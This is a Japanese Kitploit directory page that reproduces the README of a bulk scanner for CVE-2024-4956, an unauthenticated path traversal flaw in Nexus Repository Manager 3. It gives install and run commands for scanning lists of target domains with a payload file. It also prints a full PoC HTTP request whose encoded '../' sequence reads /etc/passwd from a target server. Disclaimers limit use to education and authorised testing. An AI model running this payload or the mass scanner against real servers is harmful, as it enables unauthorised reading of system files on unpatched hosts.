Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4956-Bulk-Scanner — [CVE-2024-4956] Nexus Repository Manager 3 未認証パストラバーサル一括スキャナー | Kitploit
ツール/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Nexus Repository Manager 3 未認証パストラバーサル一括スキャナー

リポジトリを見る
17641年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

README.md

CVE-2024-4956 一括スキャナー

免責事項

このツールは、教育目的および企業環境でのテストのみを目的としています。https://twitter.com/nav1n0x/ および https://github.com/ifconfig-me は、このコードの誤用について一切責任を負いません。使用は自己責任で行ってください。許可を得ていないターゲットを攻撃しないでください。このツールは公開されたペイロードを使用します。

このスキャナーは、セキュリティ愛好家が Nexus Repository のターゲットを一括でパストラバーサル脆弱性のスキャンを行うのに役立ちます。

このスキャナーは、読み込まれたターゲット数と現在のスキャン状態を表示します。URLは結果に基づいて、Timeout、Fail、Success の3つのステータスメッセージでリスト表示されます。targets.txt にドメインのリスト、lfi-payloads.txt にペイロードのリストが含まれていることを確認してください。スキャナーはテスト中の現在のURLを表示し、新しいリクエストごとに更新して、それぞれ成功または失敗を示します。また、このスクリプトは成功したURLのリストを successful_urls.txt としてディレクトリに保存します。最後に成功した試行回数のサマリーを表示します。

インストール

Python 3.6+ と pip がインストールされていることを確認してください。

  1. リポジトリをクローンします:

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
  • cd CVE-2024-4956-Bulk-Scanner
  • 必要な依存関係をインストールします:

    pip install -r requirements.txt

  • 使用方法

    1. targets.txt ファイルにドメインのリスト、lfi-payloads.txt にペイロードのリストを準備します。

    2. スキャナーを実行します:

      python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

    PoC

    root@kitploit:~
    GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
    Host: target.com:8081
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    

    成功した攻撃

    image

    スキャナー実行中の様子

    image

    免責事項

    このツールは、教育目的および企業環境でのテストのみを目的としています。 https://twitter.com/nav1n0x/ および https://github.com/ifconfig-me は、このコードについて一切責任を負いません。 使用は自己責任で行ってください。許可を得ていないターゲットを攻撃しないでください。

    ツールをダウンロード